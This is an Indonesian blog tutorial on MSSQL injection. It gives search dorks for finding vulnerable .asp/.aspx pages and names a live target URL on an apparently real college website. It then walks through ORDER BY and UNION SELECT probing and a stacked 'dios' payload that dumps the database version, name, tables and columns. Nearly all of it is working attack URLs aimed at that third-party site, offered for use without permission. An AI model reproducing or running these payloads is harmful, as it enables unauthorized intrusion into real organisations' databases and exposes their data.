Cara Melakukan MSSQL Injection
Kali ini saya akan menjelaskan bagaimana cara melakukan MSSQL Injection. Ok langsung saja ke materinya
Dork :
inurl:".aspx?id="
inurl:".asp?id="
Live target :
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324
Ciri-ciri web yang MSSQL Injection adalah menggunakan format aspx/asp jika parameter webnya .aspx?id= atau .asp?id= bisa di pastikan web tersebut MSSQL Injection bukan SQL Injection
Pertama-tama seperti biasa kita cek vuln atau tidak webnya dengan cara memberikan single quote ( ' ) jika webnya vuln maka webnya akan error
Seperti ini :
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324'
Sebelum saya beri single quote :
Setelah saya beri single quote :
Webnya error (teks yang ada dalam webnya hilang) = vuln
Oke selanjutnya langsung saja kita order by, untuk mengetahui jumlah column errornya
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324'+order+by+1--+-
(tidak error)
Naik kan angka 1 menjadi 2 menjadi 3 dan seterusnya hingga webnya memunculkan error
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324'+order+by+2--+-
(tidak error)
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=4324'+order+by+3--+-
(error !!)
Nah sekarang kita udah tau errornya ada di angka 3, selanjutnya kita lakukan union select untuk mengetahui angka togelnya
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=-4324'+union+select+1,2--+-
Jangan lupa memberi tanda - di depan id=-4324 supaya webnya memunculkan angka togelnya
Penjelasan union select :
Kenapa union select sampai angka 2 saja? Kan error nya di angka 3? Karna errornya di angka 3 maka kita melakukan union select nya sampai 2 saja, jika errornya di angka 10 maka kita melakukan union select sampai angka 9.
Dan ketika saya enter
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=-4324'+union+select+1,2--+-
Webnya memunculkan angka togelnya/angka vuln nya, selanjutnya tinggal memberikan dios saja untuk membuka database webnya
Karna ini MSSQL Injection kita tidak memberikan dios di angka togelnya melainkan di depan parameternya collection=-4324'(dios)
Dios :
;BEGIN DECLARE @a varchar(8000) SET @a='<b><font color="red" size=3>Injected By Darkness</font></b><br><b>Version : </b>'%2b@@version%2b'<br><b>Database : </b>'%2bdb_name()%2b'<br><br>' SELECT @a=@a%2b'<li>'%2btable_name%2b' :: '%2bcolumn_name FROM information_schema.columns SELECT @a AS output INTO SCREAMS_BLACKHAT END
Kalian bisa mengubah SCREAMS_BLACKHAT menjadi nickname kalian atau yang lain bebas mau di ubah jadi apa aja, di sini saya menggunakan SCREAMS_BLACKHAT untuk outputnya.
Letakkan dios seperti ini :
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=-4324';BEGIN DECLARE @a varchar(8000) SET @a='<b><font color="red" size=3>Injected By Darkness</font></b><br><b>Version : </b>'%2b@@version%2b'<br><b>Database : </b>'%2bdb_name()%2b'<br><br>' SELECT @a=@a%2b'<li>'%2btable_name%2b' :: '%2bcolumn_name FROM information_schema.columns SELECT @a AS output INTO SCREAMS_BLACKHAT END--+-
Webnya kok ga munculin apa-apa? Tenang aja selanjutnya kita tinggal melakukan output menggunakan query union select tadi
Seperti ini :
https://sfsnarengi.ac.in/pgaGallery.aspx?collection=-4324'+union+select+output,2+from+SCREAMS_BLACKHAT--+-
Dan kita telah berhasil membuka database webnya.
Mungkin sekian saja dari saya, jika ada yang masih kebingungan bisa hubungi saya lewat WhatsApp
0 Komentar
Posting Komentar